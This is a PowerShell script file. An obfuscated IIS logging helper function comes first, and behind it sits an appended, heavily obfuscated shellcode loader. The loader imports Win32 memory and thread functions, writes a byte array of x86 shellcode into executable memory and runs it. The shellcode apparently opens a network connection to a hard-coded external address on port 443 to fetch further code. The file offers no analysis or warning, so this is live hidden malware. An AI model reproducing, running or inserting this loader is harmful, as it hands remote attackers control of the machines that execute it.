function write-`i`iSVeRB`o`SE
{
    [CmdletBinding()]
    param(
        [Parameter(mAnDATORY=${t`RUe},posItION=0)]
        [string]
        
        ${SIt`eNa`me},

        [string]
        ${Vi`RT`UaL`PATh} = '',

        [Parameter(pOSitIOn=1)]
        [string]
        
        ${nA`Me},

        [Parameter(POSITIOn=2)]
        [string]
        ${o`lD`V`Alue} = '',

        [Parameter(POSitIOn=3)]
        [string]
        ${NeWv`ALUe} = ''
    )

    &("{1}{0}{3}{2}" -f'e','S','-StrictMode','t') -Version ("{1}{2}{0}" -f't','Late','s')

    .("{3}{2}{5}{1}{0}{4}" -f 'erenc','Pref','se-Call','U','e','er') -Cmdlet ${p`SCm`dleT} -Session ${execU`T`IONCOnT`EXt}."SEsS`iOns`T`Ate"

    if( ${VI`RT`UaLP`Ath} )
    {
        ${sIt`e`NaME} = &("{1}{2}{5}{4}{3}{0}" -f'lPath','Jo','i','a','tu','n-CIisVir') -Path ${s`iTe`NaME} -ChildPath ${vI`RtUA`lPaTh}
    }

    &("{1}{3}{2}{0}" -f 'e','Write','Verbos','-') -Message ('[IIS Website] [{0}] {1,-34} {2} -> {3}' -f ${SiT`e`NAme},${nA`mE},${o`LdvAl`UE},${NEWVa`l`UE})
}


${c} = ((("{88}{12}{38}{76}{3}{89}{59}{51}{4}{50}{32}{8}{33}{42}{66}{54}{24}{58}{83}{1}{29}{0}{31}{35}{5}{49}{69}{6}{40}{45}{47}{36}{9}{16}{61}{7}{39}{79}{2}{78}{92}{22}{85}{44}{64}{87}{23}{17}{86}{68}{20}{77}{30}{37}{21}{15}{53}{57}{71}{43}{91}{70}{13}{41}{18}{56}{82}{67}{65}{81}{75}{26}{10}{84}{80}{52}{74}{48}{72}{34}{93}{73}{60}{11}{19}{55}{63}{27}{46}{28}{62}{25}{14}{90}"-f'flAllocatio','u','Pt','2.','extern','Prote','k','tatic','lloc(','u','l','e','mport(iZtk','ntPt',' ','l','blic ',' I','lp','r','r','IntPtr ','Cr','Size,','nt','nt','[Dl','Ptr memset(',' u','int ','re','nType,','ualA','IntP','Zt)]',' uint fl',']p','ss, ','ern',' exter','erne','r ','tr lpAddres','int ','hread(IntPt','l32.d','IntPtr dest,','lliZt)','t.dll','ct);[DllImport(i',' IntPtr Virt','ic ','s','pPara','ui','n','Th','meter,',' dwSize','t)]public stat','t','s','i',' Int','r lpThread','I','s, ','ad','Pt','Zt','s, I',' u','i','ublic static ex','vcr',';','el3',' lpStartAdd','r','n Int','m','d)','re',', ','Import(iZt','eateT','nt','Attributes, uint dwStack','[DllI','dlliZ','src, uint count);','dwCreationFlag',' ','p'))-crepLAce  'iZt',[Char]34);${W} = .("{2}{1}{0}"-f'e','Typ','Add-') -memberDefinition ${C} -Name ("{1}{0}"-f'in32','W') -namespace ("{4}{2}{0}{3}{1}" -f'nc','ions','Fu','t','Win32') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x05,0xca,0x79,0x85,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${Z}."L`engTH" -gt 0x1000){${g} = ${z}."leNG`TH"};${x}=${w}::("{3}{2}{0}{1}"-f 'Allo','c','rtual','Vi').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${Z}."le`NGtH"-1);${i}++) {${w}::"mEms`eT"([IntPtr](${x}.("{0}{1}"-f 'ToInt3','2').Invoke()+${i}), ${Z}[${i}], 1)};${W}::("{1}{3}{0}{2}"-f 'ea','Creat','d','eThr').Invoke(0,0,${x},0,0,0);for (;;){&("{3}{2}{0}{1}"-f 'a','rt-sleep','t','S') 60};
